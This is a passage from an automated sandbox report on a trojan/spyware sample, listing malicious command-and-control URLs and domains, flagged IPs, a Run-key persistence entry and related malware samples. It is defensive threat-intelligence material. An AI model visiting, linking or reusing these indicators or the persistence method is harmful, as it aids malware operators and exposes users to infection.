                                                                        http://instagram.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ajuda.casar.comexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=M61Ae5o9b.8.drfalse
                                                                            		high
                                                                            http://www.33347.net/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.evelycosmetique.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            54.85.86.211
                                                                            		brunaeleandro.comUnited States
                                                                            		14618AMAZON-AESUStrue
                                                                            172.67.152.24
                                                                            		www.madisoncountylincoln.comUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            74.208.236.131
                                                                            		www.findmyoriginstory.comUnited States
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            217.160.0.229
                                                                            		www.emprendizajesocial.comGermany
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            172.67.194.225
                                                                            		www.metatv.appUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            188.40.83.211
                                                                            		a.uguu.seGermany
                                                                            		24940HETZNER-ASDEfalse

                                                                            Private

                                                                            IP
                                                                            192.168.2.1

                                                                            General Information

                                                                            Joe Sandbox Version:37.0.0 Beryl
                                                                            Analysis ID:831200
                                                                            Start date and time:2023-03-21 09:09:12 +01:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 12m 17s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:16
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample file name:SC_0017384.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@26/13@11/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HDC Information:
                                                                            • Successful, ratio: 72.3% (good quality ratio 66.2%)
                                                                            • Quality average: 73%
                                                                            • Quality standard deviation: 31.5%
                                                                            HCA Information:
                                                                            • Successful, ratio: 98%
                                                                            • Number of executed functions: 80
                                                                            • Number of non-executed functions: 150
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                            • Execution Graph export aborted for target SC_0017384.exe, PID 5876 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            09:10:09API Interceptor10x Sleep call for process: SC_0017384.exe modified
                                                                            09:10:21API Interceptor98x Sleep call for process: powershell.exe modified
                                                                            09:10:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            09:10:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            09:11:00API Interceptor606x Sleep call for process: explorer.exe modified
                                                                            09:11:05API Interceptor20x Sleep call for process: Lvdnyvcvr.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54.85.86.211rCL-PLCOPY.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.brunaeleandro.com/f6nc/?jpSN=uabSuQk5bnXjSKY4&AioI=YB/rb9uAbGFrcqJbvlXl0VxcpOCfBKLL9RTI9mtg5km30QhBuORVYvOJNYDRTb2/EZxoMSp3Hdpd1qUQnhhQdWBEACaHf92owA==
                                                                            Foreign Payment swift_pdf.jsGet hashmaliciousVjW0rm, FormBookBrowse
                                                                            • www.pauloeamanda.com/xrob/?k4Ihf=vT0osQUPcVS1m2BanRqdKq6oukVr4QA7akTIwikDUp9tLPuzKFTGQYtiHk4u9bEAPP0zACyJY195CJK1gotTZ9UHaK1QrqkvIaRgvSR9uO2M&ER=5j34mv8P_d9Pjp
                                                                            Swift_049949_pdf.jsGet hashmaliciousVjW0rm, FormBookBrowse
                                                                            • www.pauloeamanda.com/xrob/?2dMHz=vT0osQUPcVS1m2BanRqdKq6oukVr4QA7akTIwikDUp9tLPuzKFTGQYtiHk4u9bEAPP0zACyJY195CJK1gotWRdAhUrluteQsDQ==&Ph=UnjtXXTpx6PX
                                                                            203993093_pdf.jsGet hashmaliciousVjW0rm, FormBookBrowse
                                                                            • www.pauloeamanda.com/xrob/?MH=vT0osQUPcVS1m2BanRqdKq6oukVr4QA7akTIwikDUp9tLPuzKFTGQYtiHk4u9bEAPP0zACyJY195CJK1gotTa+AxRYdQ9JVwMg==&xr98g=BjNLF6VHN8n
                                                                            10935009_pdf.jsGet hashmaliciousVjW0rm, FormBookBrowse
                                                                            • www.pauloeamanda.com/xrob/?-ZS=vT0osQUPcVS1m2BanRqdKq6oukVr4QA7akTIwikDUp9tLPuzKFTGQYtiHk4u9bEAPP0zACyJY195CJK1gotTa+AxRYdQ9JVwMg==&m6Lp2=hlW8nHI
                                                                            20009389_pdf.jsGet hashmaliciousVjW0rm, FormBookBrowse
                                                                            • www.pauloeamanda.com/xrob/
                                                                            RFQ.exeGet hashmaliciousFormBook GuLoaderBrowse
                                                                            • www.victoria-gabriel.com/uch6/?s2MlH=TU12y5j67OEaGgRZePUpd6FZzvHjGZ064N3pQqbv9Btw9IipjKV2eZ43avzjqMKHclD+&e8CTo=aBnHuL
                                                                            zzetiXS6yl.exeGet hashmaliciousFormBookBrowse
                                                                            • www.arthurenathalia.com/pnug/?BV0hl=Taa6V28TIPY/DK2rEzt3LHX91QjVIjLw+5MplSeQp3jQox/1ma7x+/vioLBAgvNci3jd&i0=5jlHshS
                                                                            QUOTATION REQUEST - SUPPLY OF PRODUCTS - DTD JANUARY 2022PDF.xlsxGet hashmaliciousFormBookBrowse
                                                                            • www.arthurenathalia.com/pnug/?b2Jp-P0p=Taa6V28WIIY7Da6nGzt3LHX91QjVIjLw+5U55RCRtXjRoATzhKq9o7XgrutWk/Jvp0+tqg==&BxoTG=UPYLWVzxNDhhprXp
                                                                            INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                            • www.victoria-gabriel.com/avqp/?LVl4iT=JN6HZxgh3h&nVw=dUKjuECS2LRoPT3By/eYxuZ11kxomkberqeQrm1yvYPlaYtaVAnDVW0l8g9KTvQR2dZ6
                                                                            inu222.xlsxGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?zp2lNp=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&g6Ad=zfDt-nah
                                                                            ps.xlsxGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?9rlX=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&fdKP=0bdxbJQxy
                                                                            z33RH5liBO.exeGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?w6p8EX=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5gquNKQfatcc&E2JDa=Ilvx_bp8fr
                                                                            AA44244.xlsxGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?Bp=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Op=a8eXznK8An
                                                                            refno1.exeGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?JvHT=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5gquNKQfatcc&pTYT=CRDLlX
                                                                            refno.exeGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?X0D4W=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&s2JP=7nhtBPzhCHpTQv
                                                                            9qFR0r9nR9.exeGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?c48dX8=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jKUdbwnAK9b&r6tLM=ktxh2
                                                                            AAC_19002.xlsxGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?d8Jlx=9rihAdX0V2&cZlpd=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==
                                                                            Purchase Order No. 7406595 .xlsxGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?g2MhDblh=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&j4i=3fFp2buHBvU4
                                                                            J1Dud83xTM.exeGet hashmaliciousFormBookBrowse
                                                                            • www.brunoecatarina.com/p2io/?m0DDI=7n0XLDsHCfKHsv&A84HSd=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a.uguu.sevbc.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            FORM NO.30284834 2022 PROJECT.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            SNO22 PriceLetter595406_RACX-159814.exeGet hashmaliciousFormBookBrowse
                                                                            • 188.40.83.211
                                                                            sat#U0131n alma sipari#U015fi #PO06708.PDF_______________________.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            ^951105805^ICNIR00112339^20210630^^^ACC^^^^^KR^^IBS^^BIV_FRI_ICN_CO_JAS_20210630_125959_PDF.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            LoTvACZ5sr.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            Purchase 00036627-21.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            PO 9661051.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            order #111-9283848397473.exeGet hashmaliciousBitRATBrowse
                                                                            • 144.76.201.136
                                                                            order #111-9283848397474.exeGet hashmaliciousAsyncRATBrowse
                                                                            • 144.76.201.136
                                                                            detalles de devoluci#U00f3n.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            file.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            cotizaci#U00f3n.PDF______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            #U00f6deme makbuzu-i#U015f bankas#U0131.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            cotizaci#U00f3n_023.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            cotizaci#U00f3n.XLXs.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            vedo.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 144.76.201.136
                                                                            cotizaci#U00f3n.pdf______________________________.exeGet hashmaliciousLokibotBrowse
                                                                            • 144.76.201.136
                                                                            DmTTJwbVpC.exeGet hashmaliciousRaccoon RedLine SmokeLoader TofseeBrowse
                                                                            • 144.76.201.136
                                                                            hwXWDAPBmG.exeGet hashmaliciousRedLine SmokeLoader TofseeBrowse
                                                                            • 144.76.201.136
                                                                            www.madisoncountylincoln.comDHL_Express_INVOICE_AWB_CI_BL_PDF.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.105.90.131
                                                                            h42aUGJl0v.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.105.90.131

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSATT368092.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            https://googie-anaiytlcs.comGet hashmaliciousUnknownBrowse
                                                                            • 104.16.10.42
                                                                            http://googie-anaiytlcs.comGet hashmaliciousUnknownBrowse
                                                                            • 104.16.10.42
                                                                            DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 1.13.186.125
                                                                            6AD791A223AB8BB728D8D27D371AE1F97CA419948AF4B.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                            • 172.67.34.170
                                                                            VM From (937) 669-5620 On Tue March 21 2023.msgGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.22.52
                                                                            https://go.surfaccounts.com/view/Init.aspx?965970e3-51a6-4e38-b1dc-f14b6d840139:1Get hashmaliciousUnknownBrowse
                                                                            • 172.67.38.66
                                                                            luxurioux.exeGet hashmaliciousAsyncRAT, BitRAT, StormKitty, WorldWind StealerBrowse
                                                                            • 104.18.114.97
                                                                            FiveM-CheatHub.exeGet hashmaliciousDiscord Token Stealer, MercurialGrabber, OrcusBrowse
                                                                            • 162.159.137.232
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                            • 188.114.96.3
                                                                            http://vk.com/away.php?to=http://lipe2j.drcevdetaltinyazar.com/eW5nc2lldy5jaGFuQGZpcnN0c29sYXIuY29tGet hashmaliciousUnknownBrowse
                                                                            • 104.16.123.96
                                                                            https://secure.activity.best/resolutional.html?calc=test@test.comGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                            • 172.67.181.144
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                            • 188.114.96.3
                                                                            setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                            • 188.114.96.3
                                                                            AMAZON-AESUShttp://vk.com/away.php?to=http://lipe2j.drcevdetaltinyazar.com/eW5nc2lldy5jaGFuQGZpcnN0c29sYXIuY29tGet hashmaliciousUnknownBrowse
                                                                            • 3.94.218.138
                                                                            https://prezi.com/i/rx6p99-v72pt/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 52.200.133.160
                                                                            https://app.box.com/s/qft12my1l5l17o04knifd8gw776ko70iGet hashmaliciousHTMLPhisherBrowse
                                                                            • 35.170.228.5
                                                                            Agreements Pages YHGBWHS98322324.htmlGet hashmaliciousPhisherBrowse
                                                                            • 3.94.218.138
                                                                            https://nnegri-ubaes.app.box.com/notes/1169500312889?s=93wior2d16y21cmgyk3biklfy5s0q10wGet hashmaliciousHTMLPhisherBrowse
                                                                            • 44.197.221.236
                                                                            https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsequoia-kaput-leaf.glitch.me%2fddcfdf4jf5.html&c=E,1,epCyA9VmICmTMjYB9npLocEXdrCLQ5YDxg0foDoJ0ZsESdvWZaBOvbr1xqnm3zcGJCTzkaNTVSSUFUwLjn3j0XZhLVLdfNG7o3za-OAUHKSM&typo=1&ancr_add=1Get hashmaliciousHTMLPhisherBrowse
                                                                            • 34.230.219.115
                                                                            https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsequoia-kaput-leaf.glitch.me%2fddcfdf4jf5.html&c=E,1,sm25x37jqU7UgSMb573Nv-D7Ox_uRw1Bo4L5KUf14sWl4Zk_kElZWlOhw9JrICMI3Os1Gg6um20o_vmraTUnK_Ss4Vrc4IGUlRX2A6fUU6zc3B8,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                            • 54.174.104.121
                                                                            https://sequoia-kaput-leaf.glitch.me/ddcfdf4jf5.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 54.174.104.121
                                                                            https://271439.cobirosite.com/Get hashmaliciousUnknownBrowse
                                                                            • 3.94.218.138
                                                                            https://c8afw434.caspio.com/dp/f075c0008e31cda4ebb440a385d9Get hashmaliciousUnknownBrowse
                                                                            • 34.225.127.5
                                                                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 54.83.86.235
                                                                            8oxYPvmeaT.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 44.216.170.224
                                                                            DZdJX7u9Yh.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 54.28.90.136
                                                                            http://go.onelink.me/107872968?pid=InProduct&c=Global_Internal_YGrowth_AndroidEmailSig__AndroidUsers&af_wl=ym&af_sub1=Internal&af_sub2=Global_YGrowth&af_sub3=EmailSignature&af_web_dp=http://v1f6wei4.hyundaieastern.com/?email=nobody@example.comGet hashmaliciousUnknownBrowse
                                                                            • 34.193.113.164
                                                                            #U266c audiovoice549246_3-2(3).hTmGet hashmaliciousUnknownBrowse
                                                                            • 3.217.157.131
                                                                            kXf5n24SG6.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 52.87.131.12
                                                                            https://rebrand.ly/1c050fGet hashmaliciousGRQ ScamBrowse
                                                                            • 34.192.196.129
                                                                            https://url.avanan.click/v2/___https://www.newsbreakmail.com/redirect/aHR0cHM6Ly9yb3Q0bWFuLXR5by50b3AvI1pHRnVhV1ZzTG5OMFlXeHNiMjVsUUd0aWNtRXVZMjl0___.YXAzOmticmE6YTpvOjM3ZGNkM2I2NDAyYWZmYzM5OWFjNTVmZGU2YjMwOTM1OjY6ODBiYjoxNzNiY2YxNTlhNmZjMDRmOTRkMGExNjU2MjQwNDExZGNmYjNhYjk5MDY4YmE3ZDA4ODA4YzkwY2Q3MWVkM2ZkOmg6VAGet hashmaliciousCaptcha PhishBrowse
                                                                            • 3.219.226.156
                                                                            xPD6Q78Pfn.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 54.136.113.234
                                                                            https://app.box.com/s/n842fhlv55ilqavz036iybq21tqasjr7Get hashmaliciousHTMLPhisherBrowse
                                                                            • 54.157.194.5

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0ezqwioujj.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            6AD791A223AB8BB728D8D27D371AE1F97CA419948AF4B.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                            • 188.40.83.211
                                                                            DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exeGet hashmaliciousNjrat, STRRAT, WSHRATBrowse
                                                                            • 188.40.83.211
                                                                            luxurioux.exeGet hashmaliciousAsyncRAT, BitRAT, StormKitty, WorldWind StealerBrowse
                                                                            • 188.40.83.211
                                                                            #Ud83d#Udce7 Tax Statements-2-121_076_454656_3-4(4).hTmGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                                            • 188.40.83.211
                                                                            file.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            file.exeGet hashmaliciousGurcu StealerBrowse
                                                                            • 188.40.83.211
                                                                            T4oIN41uUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            Q4YODvoYjL.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                            • 188.40.83.211
                                                                            g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.40.83.211
                                                                            Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            • 188.40.83.211
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                            • 188.40.83.211
                                                                            setup.exeGet hashmaliciousXmrigBrowse
                                                                            • 188.40.83.211

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Lvdnyvcvr.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1570
                                                                            Entropy (8bit):5.357969604744043
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXwYHKhQnowHBtHoxHhAHKzvAHKgmHKKHKdHKBo:iqXwYqhQnowhtIxHeqzIqTqKqdqy
                                                                            MD5:01403378423BC80FF1C71B821B33B07C
                                                                            SHA1:B86FAFEDD98B3237252375E7DAA5215A20C4E0D1
                                                                            SHA-256:D29D2FC27260201D6E5B6AFDC218CD254AE25E692C2935A1E07B50922114FDDE
                                                                            SHA-512:FA447D7B7146B128265A12610F56CB8E3FE5A191A1AC7EEFED644D6C2FB0D8DB2FDF0075058BD2DF939725640DE5432B3F8C3A6E75CE3292CF9952C8C127C0D9
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SC_0017384.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):1570
                                                                            Entropy (8bit):5.357969604744043
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXwYHKhQnowHBtHoxHhAHKzvAHKgmHKKHKdHKBo:iqXwYqhQnowhtIxHeqzIqTqKqdqy
                                                                            MD5:01403378423BC80FF1C71B821B33B07C
                                                                            SHA1:B86FAFEDD98B3237252375E7DAA5215A20C4E0D1
                                                                            SHA-256:D29D2FC27260201D6E5B6AFDC218CD254AE25E692C2935A1E07B50922114FDDE
                                                                            SHA-512:FA447D7B7146B128265A12610F56CB8E3FE5A191A1AC7EEFED644D6C2FB0D8DB2FDF0075058BD2DF939725640DE5432B3F8C3A6E75CE3292CF9952C8C127C0D9
                                                                            Malicious:true
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):5829
                                                                            Entropy (8bit):4.8968676994158
                                                                            Encrypted:false
                                                                            SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                            MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                            SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                            SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                            SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                            Malicious:false
